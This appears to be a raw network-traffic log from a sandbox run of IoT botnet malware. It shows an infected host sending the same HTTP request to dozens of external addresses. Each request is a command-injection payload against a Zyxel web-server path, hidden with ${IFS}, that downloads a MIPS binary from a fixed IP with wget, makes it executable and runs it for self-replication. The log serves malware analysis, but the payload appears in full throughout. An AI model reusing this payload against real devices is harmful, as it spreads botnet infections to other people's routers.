                                            Feb 2, 2024 06:20:25.197582006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            342192.168.2.155212039.253.67.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197614908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            343192.168.2.1560110186.226.244.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197652102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            344192.168.2.154311844.180.159.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197688103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            345192.168.2.1546804107.117.242.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197717905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            346192.168.2.155346073.15.172.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197752953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            347192.168.2.1558412221.16.153.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197784901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            348192.168.2.155068054.29.230.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197796106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            349192.168.2.154274687.244.150.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197832108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            350192.168.2.155353014.58.60.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197844028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            351192.168.2.1543424222.253.129.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197885036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            352192.168.2.153961678.26.81.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197922945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            353192.168.2.153680292.56.65.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197962999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            354192.168.2.1551194118.32.142.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.197983027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            355192.168.2.1538518160.117.163.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198030949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            356192.168.2.1536816182.244.61.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198030949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            357192.168.2.155206096.146.171.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198060989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            358192.168.2.155676275.193.197.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198091030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            359192.168.2.1554088134.70.240.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198136091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            360192.168.2.1556874206.61.71.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198137999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            361192.168.2.1551690167.164.141.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198179960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            362192.168.2.1534884154.104.138.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198196888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            363192.168.2.1548872169.147.177.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198220015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            364192.168.2.1547846147.148.193.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198234081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            365192.168.2.1549442173.27.229.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198268890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            366192.168.2.153791293.21.18.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198293924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            367192.168.2.1549556136.234.34.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198328018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            368192.168.2.1543980146.89.248.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198365927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            369192.168.2.153350638.115.136.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198385954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            370192.168.2.155173849.56.76.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198400974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            371192.168.2.153763851.247.209.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.198429108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            372192.168.2.154073618.120.75.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.199037075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            373192.168.2.1544688118.178.253.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.199065924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            374192.168.2.15370929.209.213.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.199111938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            375192.168.2.154158850.68.196.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.199176073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            376192.168.2.153901494.137.96.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:25.199281931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            377192.168.2.1536054209.211.9.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:26.203440905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            378192.168.2.1551620210.227.239.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:26.203461885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            379192.168.2.1549704177.211.162.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:26.203479052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            380192.168.2.1540586100.159.60.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:26.203532934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            381192.168.2.1533708125.202.244.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:26.203562975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            382192.168.2.154415467.81.28.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:26.203620911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            383192.168.2.1548248101.18.42.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:26.203656912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            384192.168.2.153336273.79.250.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:26.203701973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            385192.168.2.154482695.109.171.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:26.203738928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            386192.168.2.153574820.248.130.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:26.203922033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            387192.168.2.1533856217.43.175.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:27.207590103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            388192.168.2.1549906111.175.125.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:27.207684994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            389192.168.2.1536620187.27.233.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:28.211664915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            390192.168.2.1542696218.174.163.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:28.211707115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            391192.168.2.1547082168.149.255.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:28.211729050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            392192.168.2.154138843.107.251.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:28.211787939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            393192.168.2.154966894.193.210.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:28.211939096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            394192.168.2.155613495.34.193.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:28.211939096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            395192.168.2.155639825.137.47.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:28.211971045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            396192.168.2.154696890.101.235.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:29.216830015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            397192.168.2.154586259.50.87.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:29.216846943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            398192.168.2.153392012.198.29.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:29.216862917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            399192.168.2.1559692160.255.203.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:29.216999054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            400192.168.2.1536162182.190.189.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:30.220912933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            401192.168.2.1547342198.133.221.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:30.220961094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            402192.168.2.1544608140.207.49.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:30.220977068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            403192.168.2.1544820195.168.250.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:30.221025944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            404192.168.2.15421762.217.254.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:20:30.221062899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            405192.168.2.155447640.128.190.228443
                                            TimestampBytes transferredDirectionData
